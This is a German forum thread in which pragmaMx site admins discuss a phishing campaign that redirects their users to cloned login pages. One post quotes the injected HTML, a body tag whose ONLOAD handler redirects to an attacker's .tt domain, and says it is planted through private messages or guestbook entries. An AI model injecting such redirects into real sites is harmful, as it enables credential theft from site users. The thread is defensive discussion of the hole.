Sicherheitsproblem mit Fake-Domain

Begonnen von Karaca, 29 Juni 2005, 21:03:13

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Karaca

Hallo ich habe jetzt ein ganz neues anderes Problem endeckt.Ich habe mich eben auf meiner Seite als Admin angemeldet und werde eigentlich automatisch auch gleichzeitig als Benutzer angemeldet.Als ich aber einen Forumsbeitrag lesen wollte wurde ich wieder aufgefordert meinen Benutzernamen und Passwort erneut einzugeben.Mir fiel daraufhin auf das sich oben an das ".de" noch zusätzlich ein ".de.tt" angehängt hatte an der adresse.ich habe daraufhin falsche Angaben gemacht und auf Absenden geklickt.Die Daten dich ich eingegeben habe wurden dann wie man unten in der Statusleiste sehen konnte per Formailer weiterverschickt.Ich habe den Webspace besucht und noch andere Seiten gefunden auf der man meine und noch andere Vkp mx Seiten sowie Msn und Hotmail gefaked hat,Das einzige was ich jetzt nicht verstehe ist wie die Weiterleitung zustanden gekommen ist.Ich habe schon Lycos der dem Hacker den Webspace zur Verfügung stellt angeschrieben aber bisher noch keine Antwort erhalten.
Andere betroffene Seiten sind
www.palpalo.de (Vkp)
www.rebir.com (Vkp)
www.aleviler.de (Vkp)
www.flirtlife.de
www.msn.de
www.hackeriz.com (Nuke)

onkel

ZitatHallo ich habe jetzt ein ganz neues anderes Problem endeckt.Ich habe mich eben auf meiner Seite als Admin angemeldet und werde eigentlich automatisch auch gleichzeitig als Benutzer angemeldet.Als ich aber einen Forumsbeitrag lesen wollte wurde ich wieder aufgefordert meinen Benutzernamen und Passwort erneut einzugeben.Mir fiel daraufhin auf das sich oben an das ".de" noch zusätzlich ein ".de.tt" angehängt hatte an der adresse.ich habe daraufhin falsche Angaben gemacht und auf Absenden geklickt.Die Daten dich ich eingegeben habe wurden dann wie man unten in der Statusleiste sehen konnte per Formailer weiterverschickt.Ich habe den Webspace besucht und noch andere Seiten gefunden auf der man meine und noch andere Vkp mx Seiten sowie Msn und Hotmail gefaked hat,Das einzige was ich jetzt nicht verstehe ist wie die Weiterleitung zustanden gekommen ist.Ich habe schon Lycos der dem Hacker den Webspace zur Verfügung stellt angeschrieben aber bisher noch keine Antwort erhalten.
Andere betroffene Seiten sind
www.palpalo.de (Vkp)
www.rebir.com (Vkp)
www.aleviler.de (Vkp)
www.flirtlife.de
www.msn.de
www.hackeriz.com (Nuke)

Du hast ein Dailer auf dein PC  ::)

onkel

TOLL  ;D jetzt hast du es entfernt...

Andi

Hi :)

So ganz versteh ich das nicht.
Irgendeiner hat deine Seite gefakt?

Wüsste nicht, was das mit dem pragmaMx zu tun hat, oder versteh ich das falsch? Gibt es da nen Link und ein Login zum ansehen?


Habe den Post vom anderen Thread abgetrennt.
Ist ja ein ganz anderes Thema :-\
schön´s Grüssle, Andi

NeMeSiSX2LC

flirtlife.de?? und dailer?? Onkel erzähl mal weiter. Würde micgh freuen wen da was handfestes kommt.
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1


Firat

Dieser Beitrag ist eigentlich eine Antwort zu diesem Topic aber so können noch mehr Leute lesen was das Problem ist.
Unzwar anscheinen haben paar Jugendliche eine Sicherhietslücke entdeckt und können durch  PMs oder Gästebucheinträge auf eigene Fake-Seiten weiterleiten und so dazu zwingen in loginformular die Passwörter zu klauen. Und hier ist die Lücke womit sie dies tun

<body id="gatewaypage" class="readstep2"  ONLOAD="location.href='http://www.deineseite.au.tt'; return false;">
    <div id="mainnavigation">


und auf der weitergeliteten Seite existiert dann eine 1 zu 1 Fake-Seite mit Loginformular!

NeMeSiSX2LC

Haste mal ne URL zu dem der Sache glaube ich nämlich nicht wirklich was das dat steht
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1

Firat

#8
dann versuch das mal selber in dem du einfach eine pm an dich selber schickst!
und hier sind die Fake seiten

http://home.arcor.de/EDITIERT/

Andi

Es geht, wenn die übergebenen HTML-Tags nicht komplett gefiltert werden.
Kann durchaus sein, dass sowas auch in einigen Modulen möglich ist.
Sowas global auszuschliessen, bringt m.E. nicht viel, weil irgendjemand kommt dann wieder angelaufen, dass da wieder irgendwas nicht richtig geht.... Habe das vor kurzem gerade in einem anderen Forum beobachtet...

Den Link oben habe ich nicht geändert, weil da die Seiten zu sehen waren/sind, sondern weil auf der gleichen Homepage auch Links zu Scripten für "Mail-Bomben" und so Zeugs vorhanden waren.
schön´s Grüssle, Andi

selin01

Hallo Leute,

genau das ist mir auch aufgefallen. Wie oben Karaca schon geschrieben hat, hat es bei mir auch solche Fakes und Codes gegeben.

Ich habe den User solcher Beiträge ausfindig machen können und darauf hin alles gesperrt.

Dennoch wird dieser es wieder versuchen wollen.